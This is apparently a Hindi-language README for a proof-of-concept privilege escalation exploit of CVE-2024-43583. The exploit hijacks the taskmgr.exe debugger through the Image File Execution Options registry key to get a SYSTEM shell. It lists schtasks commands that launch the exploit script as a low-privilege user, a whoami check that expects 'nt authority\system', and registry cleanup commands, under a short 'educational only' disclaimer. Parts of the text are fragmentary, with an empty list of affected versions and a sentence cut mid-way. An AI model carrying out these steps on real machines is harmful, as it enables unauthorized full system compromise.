
CVE-2024-43583 के लिए प्रूफ ऑफ कॉन्सेप्ट
लेखक: No0B@ckSappi3 Instagram: No0BackSappi3
CVE-2024-43583 एक विशेषाधिकार उन्नयन कमजोरी है जो Microsoft के Winlogon घटक को प्रभावित करती है। इस दोष का शोषण करने से निम्न-विशेषाधिकार वाला उपयोगकर्ता अपने विशेषाधिकारों को SYSTEM तक बढ़ा सकता है, जिससे पूर्ण सिस्टम से समझौता हो जाता है।
यह प्रूफ-ऑफ-कॉन्सेप्ट (PoC) Windows इमेज फ़ाइल निष्पादन विकल्प (IFEO) रजिस्ट्री कुंजी के माध्यम से डिबगर हाइजैकिंग का लाभ उठाता है ताकि एक वैध सिस्टम प्रक्रिया को दुर्भावनापूर्ण पेलोड से बदला जा सके।
प्रभावित Windows संस्करण
यह शोषण केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। इसे अनधिकृत सिस्टम पर उपयोग न करें। इस शोषण का दुरुपयोग अवैध हो सकता है।
सुनिश्चित करें कि लक्ष्य सिस्टम पर Python स्थापित है। यदि नहीं, तो संकलित .exe संस्करण का उपयोग करें।
python poc-43583.py
schtasks /create /tn "LowPrivExploit" /tr "C:\Path\To\python.exe C:\Path\To\poc-43583.py" /sc once /st 00:00 /ru lowpriv /f
schtasks /run /tn "LowPrivExploit"
Ctrl + Shift + Esc). सफल होने पर, इसके बजाय एक SYSTEM शेल दिखाई देगा।एक बार शोषण चलने पर, अपने विशेषाधिकार जांचें:
whoami
अपेक्षित आउटपुट:
nt authority\system
स्क्रिप्ट को पुनः चलाएं और हाइजैक को हटाने के लिए विकल्प [2] चुनें।
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f
schtasks /delete /tn "LowPrivExploit" /f
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"